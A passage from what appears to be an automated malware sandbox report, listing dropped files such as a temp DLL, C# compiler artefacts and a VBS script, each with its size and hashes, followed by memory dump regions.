2f9e18fedf28a22a2f7b679deeca974b73440b1517f0ec4a0f7d2affac93e095

SHA512
3322f1417a7d00506a6cb34f246bb42af9dc38e935ff48a204cac9f69d410791b972ea260708a51f1458e0c0a25beee429157b21d4aab8ae628418bb2b81b96d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF06D.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\yyktdyot.dll

Filesize
3KB

MD5
896aad22d40f9cae89ad5155088c31a2

SHA1
3255238f422b02c04dc66bda7ea9c7210b02b898

SHA256
75178a319e47d4a0997ee5f124b333bf0c113ec28bddb04170cf7627f256e34d

SHA512
b900421d16134af9f96e17464472943560b3c92c1a7d7347ac89cd61850932c49b4fb7dff2a390860f2349953a18a489fc5c6cf908d42c73eecd08f8ad34856c

Download Submit
C:\Users\Admin\AppData\Local\Temp\yyktdyot.pdb

Filesize
7KB

MD5
4d4be7b092d3235966701d53f46d6121

SHA1
238800f01f71876a7f50f9c73b67a4f03c7ca820

SHA256
1284399a802a251cd983c9f3e8c8dd6fa17e79dd282442815ca1d4a5635b0fe5

SHA512
4cda582b454af8a46358fcc18daf5302a49f2a380a978e3f010356f1b91db7a367e09896c2d82c1ba71451bc2614e5b82e340578e21d4eaec444734eba015a7e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
592bacba93ffc29214084c346452eade

SHA1
9c40eb5115f15679de69d96b53c0c0821d4fcbc3

SHA256
da09e11a2a9ce5a326cf74c73ee3a205b52dbbe8975b0c2600c4a7e3bee9cc36

SHA512
815212f6688bb83a8b5faefb7e083b03c22ba5767dd85ff1e4a5cec4ba98bc766500f129cdfd580b360dc09f06c34347718472cf267fc8c082bbab450bc54ce9

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithmebackwithnewthingsgreatforme.vbs

Filesize
138KB

MD5
6ee290a97ed7f5bcf1d264fcb5e1e4f7

SHA1
0851b61aa41328bac3ed7160eba1151a6faf2f0b

SHA256
b0d216e063b15e640ee73f15277cbd58b8d2a38ee96f61a8ad1e1bc36e400b88

SHA512
5aff6b07f5d77f548ece9bd2609177f0a742123ffd2f1861f0008dfb0f51d137a15a4c9436fc48c64b40c733bb550eb894e3a5bff3855b533262a06390b4034e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC500.tmp

Filesize
652B

MD5
0b37ee12956729c402967e3e88014d0a

SHA1
4e3dcf43ec1621206f4c3a2af2bd9618b1b37733

SHA256
a14341bde8660246a50fed072134a475fa0b21e56623bc2661e77ad74f75e372

SHA512
fca1d3458484ea0b7dda4e4d80e0a67d4f5a99de1d1de4f5f9e2912cb7830dd96c9a6aad825137bec1ec3f1fb7c7d0d5184584fe4113a62d1c8c59ad0fe560c1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yyktdyot.0.cs

Filesize
473B

MD5
205f375dc3c53a766f92ffdea3687dde

SHA1
4d6aeadd2f24e149e06b17ecff040e835c78efa1

SHA256
25267d3b40367bbddf882619d418415a2c49bd26d964b6e2d5e214d92a8f87ab

SHA512
7708b1b37f3e2e156762f2704f4b70bf9c92473e1f8874ffc52e8f020a519a14f610b6e855059fa8dda425708e95a65ef8e925bf8ac998bb703b6770b7d2692f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yyktdyot.cmdline

Filesize
309B

MD5
4066ed7bf38e6e65cb603f5ce7a32b32

SHA1
17bb657c8b9da7928d27db26c51c4ec54fb0d970

SHA256
aa9cc192081d5360f455e0f48428c6a5dc397fee57283e9da4df66d7402ea55d

SHA512
234805ebc4d5865be740a06a3d9bd39e2c491c024e4a7dacad4db21ad4b70589839adcf0182d575be5b9a3f6d25a6fc0f94304bdbb5cc92ba984173dcd9cf335

Download Submit
memory/1440-135-0x00000000026E0000-0x00000000026E2000-memory.dmp

Filesize
8KB

Download
memory/1708-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1708-136-0x0000000002EA0000-0x0000000002EA2000-memory.dmp

Filesize
8KB

Download
memory/1708-180-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

Filesize
44KB

Download
memory/1708-1-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

Filesize
44KB

Download